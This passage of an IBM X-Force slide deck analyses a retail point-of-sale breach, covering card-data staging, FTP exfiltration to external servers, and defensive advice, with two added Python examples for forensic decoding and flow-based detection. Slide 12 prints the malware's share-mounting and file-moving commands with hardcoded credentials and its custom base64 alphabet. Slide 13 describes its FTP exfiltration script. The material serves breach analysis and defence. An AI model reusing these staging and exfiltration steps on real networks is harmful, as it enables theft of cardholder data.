     Chip-and-PIN encrypts the transaction from the card to processor
     Stores stolen card data in file %SystemRoot%\system32\winxml.dll
  • 12. 5. Harvested card data is sent to internal rally point
    [Diagram callout 5: Malware sends CC data to internal server; sends custom ping to notify; Retailer POS systems; Retailer Windows file server]
     Moves stolen card data to a central collection point
     Assumes POS systems have no internet access
     Creates temp Windows share on domain
     Malware on rally point creates share in %windir%\twain_32
     Encodes base64, with encoding string JN8hdEe3P0cUMTs5kQolDWC9BV26GjRIZnXfOF+K4rYtmqg7b/y1xwvpHiLAzSau
     Moves winxml.dll to <RallyPoint>_<Day>_<Mon>_<Hr>.txt
     POS malware sends custom ICMP to the rally point as a semaphore
    Commands run on the infected POS:
      net use S: \\<HardCodedIP>\c$\WINDOWS\twain_32 /user:Best1_user BackupU$r
      move %windir%\system32\winxml.dll S:\<InfectedMachineName>_<Day>_<Month>_<Hour>.txt
      net use S: /del
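Added example, not from the slides: a decoder for the custom base64 alphabet quoted above and a parser for the <InfectedMachineName>_<Day>_<Month>_<Hour>.txt names, written from the incident-response side so a team that recovers the twain_32 share can scope which hosts and hours are affected. The alphabet is the one on the slide; the sample record, host names and file names are constructed.

```python
"""Forensic helpers for the rally-point stage (added example, not slide content)."""
import base64
import string
from dataclasses import dataclass

STANDARD_ALPHABET = (string.ascii_uppercase + string.ascii_lowercase
                     + string.digits + "+/")
# Custom alphabet quoted on slide 12; it is a permutation of the standard one.
CUSTOM_ALPHABET = "JN8hdEe3P0cUMTs5kQolDWC9BV26GjRIZnXfOF+K4rYtmqg7b/y1xwvpHiLAzSau"

if len(CUSTOM_ALPHABET) != 64 or set(CUSTOM_ALPHABET) != set(STANDARD_ALPHABET):
    raise ValueError("custom alphabet must be a permutation of the base64 alphabet")

# Byte translation tables in both directions ('=' padding is untouched).
_TO_STANDARD = bytes.maketrans(CUSTOM_ALPHABET.encode(), STANDARD_ALPHABET.encode())
_TO_CUSTOM = bytes.maketrans(STANDARD_ALPHABET.encode(), CUSTOM_ALPHABET.encode())


def decode_custom_b64(blob: bytes) -> bytes:
    """Map the custom alphabet back onto the standard one, then decode.

    Padding is restored if the dump was written without '=' characters, and
    any byte outside the alphabet raises instead of being silently skipped.
    """
    data = blob.strip().translate(_TO_STANDARD)
    data += b"=" * (-len(data) % 4)
    return base64.b64decode(data, validate=True)


def encode_custom_b64(raw: bytes) -> bytes:
    """Inverse of decode_custom_b64; used here only to build constructed test data."""
    return base64.b64encode(raw).translate(_TO_CUSTOM)


@dataclass(frozen=True)
class DumpFile:
    host: str
    day: int
    month: int
    hour: int


def parse_dump_filename(name: str) -> DumpFile:
    """Parse <InfectedMachineName>_<Day>_<Month>_<Hour>.txt.

    Splits from the right so host names that contain underscores survive.
    """
    if not name.lower().endswith(".txt"):
        raise ValueError(f"not a dump file name: {name}")
    parts = name[:-4].rsplit("_", 3)
    if len(parts) != 4 or not all(p.isdigit() for p in parts[1:]):
        raise ValueError(f"unexpected dump file name: {name}")
    host, day, month, hour = parts
    return DumpFile(host, int(day), int(month), int(hour))


def affected_hosts(filenames: list[str]) -> dict[str, list[DumpFile]]:
    """Group recovered dump files by infected host for impact analysis."""
    out: dict[str, list[DumpFile]] = {}
    for n in filenames:
        d = parse_dump_filename(n)
        out.setdefault(d.host, []).append(d)
    return out


if __name__ == "__main__":
    # Constructed sample record (hypothetical host name, public test PAN).
    sample = b"REG_POS_42;4111111111111111=2512101?"
    blob = encode_custom_b64(sample)
    print("encoded:", blob.decode())
    print("decoded:", decode_custom_b64(blob).decode())
    # Constructed file names as they would appear in the twain_32 share.
    names = ["REG_POS_42_15_12_09.txt", "REG_POS_42_15_12_10.txt", "LANE7_16_12_02.txt"]
    for host, files in affected_hosts(names).items():
        print(host, [(f.day, f.month, f.hour) for f in files])
```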
  • 13. 6. Card data is exfiltrated to FTP servers in Russia
    [Diagram callout 6: Attacker FTP servers (external/Russia); Retailer Windows file server; Stolen data is exfiltrated to FTP servers]
     Compiles all card dumps into c:\windows\twain_32\a.dll
     Exfiltrates data via FTP to <PublicFTPServer>/public_html/cgi-bin
     Generates an FTP script and executes ftp -s <path>\cmd.txt
  • 14. Protect endpoints
     The ultimate prize:
      – POS systems: where the card data is processed
      – File servers: base of operations
      – Web servers: initial incursion vector
      – Contractor workstations: intelligence, credentials
     Malware protection:
      – Contractor workstations (phishing, Citadel bot)
      – POS systems: RAM scraper trojan
      – File servers: data management and exfiltration tools
      – Application isolation (Intel SGX, micro-virtualization, etc.) to prevent RAM scraping
     Patch
     Configuration management
  • 15. Protection against web and file server compromises
     Secure development lifecycle (SDLC)
      – Secure coding practices training
      – Static/source code analysis: manual (code review) and automated
      – Dynamic code analysis (esp. low hanging fruit: SQL injection & XSS)
      – Include compiled applications, web applications, mobile apps
     Go-live security process
      – Harden system (reduce footprint/services, suppress excess information, harden apps, change usernames / passwords)
      – Install appropriate endpoint protection and configuration management
      – Vulnerability scan
     Appropriate authentication
      – Separate domains / administrative credentials (identity separation)
      – Multi-factor authentication
  • 16. Segment critical assets
    Image source: http://nationalgeographic.com
     Enumerate & classify
     Restrict web assets' access to internal systems
     Isolate public / partner facing assets from private assets
     Segment operational technology (OT), critical assets, and general IT
     Perform firewall rule analysis, paying special attention to:
      – assets containing sensitive data, such as cardholder information
      – risky protocols and flow directions
     For example, POS systems shouldn't
      – mount Windows shares, or
      – send regular ICMP packets
  • 17. Monitor & detect: network
     Network activity pattern monitoring can detect:
      – Suspicious scanning activity as attacker maps out the network landscape
      – Policy violations for outbound FTP, especially to Eastern Bloc countries
     Network packet inspection can detect:
      – IPS can stop SQL injection, XSS, other more advanced attacks
      – Credit card number patterns in outbound data
      – Suspect strings in ICMP packets
      – Network traffic that is not what it seems, e.g.:
        • Non-DNS protocol over port 53
        • IRC over port 80
  • 18. Monitor & detect: vulnerability and anomaly detection
     Vulnerability scanning, including deep endpoint assessment
      – example: registry entries containing "POSWDS"
     Anomaly detection
      – Profile behavior of critical assets, e.g., POS and HVAC systems (if remote access)
      – Detect deviations from baseline:
        • POS connecting to Windows shares
        • POS emitting ICMP packets
      – General anomalous behavior or change in network pattern: ICMP, SMB/CIFS, FTP
      – Profile ICMP packet sizes, normal payload contents; identify & block deviations
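Added example, not from the slides: the baseline deviations listed on slides 16 to 18 (POS hosts mounting Windows shares, POS hosts emitting ICMP, ICMP payloads that depart from a normal ping, FTP leaving the internal network) written as checks over constructed flow records. The addresses, the POS asset list, the semaphore payload and the log format are assumptions for the demo; the geographic FTP check from slide 17 is reduced to internal-to-external.

```python
"""Flow-baseline checks for POS and file-server traffic (added example, not slide content)."""
import ipaddress
from dataclasses import dataclass

# Asset classification (assumed): which internal addresses are POS terminals.
POS_HOSTS = {"10.0.5.11", "10.0.5.12", "10.0.5.13"}
# RFC 1918 ranges stand in for "the internal network" in this demo.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
SMB_PORTS = {139, 445}
FTP_PORT = 21
# Data carried by a stock Windows ping (32 bytes); the profiled "normal" ICMP payload.
NORMAL_PING_PAYLOAD = b"abcdefghijklmnopqrstuvwabcdefghi"
# Constructed stand-in for a custom semaphore ping; the real content is not on the slides.
SEMAPHORE_PAYLOAD = b"dump-ready"


@dataclass(frozen=True)
class Flow:
    src: str
    dst: str
    proto: str        # "tcp", "udp" or "icmp"
    dport: int        # 0 for icmp
    payload: bytes = b""


@dataclass(frozen=True)
class Alert:
    rule: str
    flow: Flow


def is_internal(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def check_flow(f: Flow) -> list[Alert]:
    """Apply every baseline rule to one flow; a flow can trip several rules."""
    alerts = []
    if f.src in POS_HOSTS and f.proto == "tcp" and f.dport in SMB_PORTS:
        alerts.append(Alert("pos-smb-share", f))          # slide 16/18: POS mounting shares
    if f.src in POS_HOSTS and f.proto == "icmp":
        alerts.append(Alert("pos-icmp", f))               # slide 16/18: POS emitting ICMP
    if f.proto == "icmp" and f.payload and f.payload != NORMAL_PING_PAYLOAD:
        alerts.append(Alert("icmp-payload-deviation", f))  # slide 18: payload profiling
    if f.proto == "tcp" and f.dport == FTP_PORT and is_internal(f.src) and not is_internal(f.dst):
        alerts.append(Alert("outbound-ftp", f))           # slide 17: outbound FTP policy
    return alerts


def parse_flow(line: str) -> Flow:
    """Parse 'src dst proto dport [payload-hex]' (constructed log format)."""
    parts = line.split()
    payload = bytes.fromhex(parts[4]) if len(parts) > 4 else b""
    return Flow(parts[0], parts[1], parts[2], int(parts[3]), payload)


def scan(lines) -> list[Alert]:
    return [a for line in lines if line.strip() for a in check_flow(parse_flow(line))]


# Constructed sample flows: one line per record.
SAMPLE_LOG = [
    "10.0.5.11 10.0.1.20 tcp 445",                               # POS mounting a share
    f"10.0.5.12 10.0.1.20 icmp 0 {SEMAPHORE_PAYLOAD.hex()}",     # POS custom ping
    f"10.0.7.30 10.0.1.20 icmp 0 {NORMAL_PING_PAYLOAD.hex()}",   # ordinary ping, non-POS host
    "10.0.1.20 203.0.113.9 tcp 21",                              # file server to external FTP
    "10.0.5.13 10.0.2.5 tcp 443",                                # ordinary POS traffic
]


def demo_rules() -> list[str]:
    """Rule names tripped by SAMPLE_LOG, in log order."""
    return [a.rule for a in scan(SAMPLE_LOG)]


if __name__ == "__main__":
    for a in scan(SAMPLE_LOG):
        print(f"{a.rule:24} {a.flow.src} -> {a.flow.dst} {a.flow.proto}/{a.flow.dport}")
```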
  • 19. Incident Response
     Speedy and complete forensics
      – early in the process if the compromise is detected before data is stolen, or
      – after a severe breach when accurate impact analysis is critical:
        • Which systems were compromised?
        • How many customers were affected?
        • How much of the data comprised personal information?
     Instrument everything feasible
      – include POS systems and network activity
      – Enrich with context from
        • vulnerability assessment tools
        • change management transactions
        • security intelligence feeds
  • 20. Incident / emergency response
     Plan should include
      – Detection
      – Response and escalation
      – Engaging law enforcement as appropriate
      – Preservation of evidence
      – Compliance with regulations and contractual agreements
      – Customer and press notification
      – Public relations
     Engage your contracted external emergency response agency in advance
      – Help you prepare for a breach and
      – Gather context about your environment
     Test your process regularly
     Business associate contract and assessment
  • 21. At IBM, the world is our security lab
     Security Operations Centers
     Security Research and Development Labs
     Institute for Advanced Security Branches
     More than 6,000 IBM researchers, developers, and subject matter experts ALL focused on security
     3,000 IBM security patents
    v13-01
  • 22. Get Engaged with IBM X-Force Research and Development
     Follow us at @ibmsecurity and @ibmxforce
     Download X-Force security trend & risk reports: http://www.ibm.com/security/xforce/
     Subscribe to X-Force alerts at iss.net/rss.php or the IBM Security blog at www.securityintelligence.com
  • 23. Statement of Good Security Practices
    IT system security involves protecting systems and information through prevention, detection and response to improper access from within and outside your enterprise. Improper access can result in information being altered, destroyed or misappropriated or can result in damage to or misuse of your systems, including to attack others. No IT system or product should be considered completely secure and no single product or security measure can be completely effective in preventing improper access. IBM systems and products are designed to be part of a comprehensive security approach, which will necessarily involve additional operational procedures, and may require other systems, products or services to be most effective. IBM DOES NOT WARRANT THAT SYSTEMS AND PRODUCTS ARE IMMUNE FROM THE MALICIOUS OR ILLEGAL CONDUCT OF ANY PARTY.
    www.ibm.com/security
    © Copyright IBM Corporation 2013. All rights reserved. The information contained in these materials is provided for informational purposes only, and is provided AS IS without warranty of any kind, express or implied. IBM shall not be responsible for any damages arising out of the use of, or otherwise related to, these materials. Nothing contained in these materials is intended to, nor shall have the effect of, creating any warranties or representations from IBM or its suppliers or licensors, or altering the terms and conditions of the applicable license agreement governing the use of IBM software. References in these materials to IBM products, programs, or services do not imply that they will be available in all countries in which IBM operates. Product release dates and/or capabilities referenced in these materials may change at any time at IBM's sole discretion based on market opportunities or other factors, and are not intended to be a commitment to future product or feature availability in any way.
    IBM, the IBM logo, and other IBM products and services are trademarks of the International Business Machines Corporation, in the United States, other countries or both. Other company, product, or service names may be trademarks or service marks of others.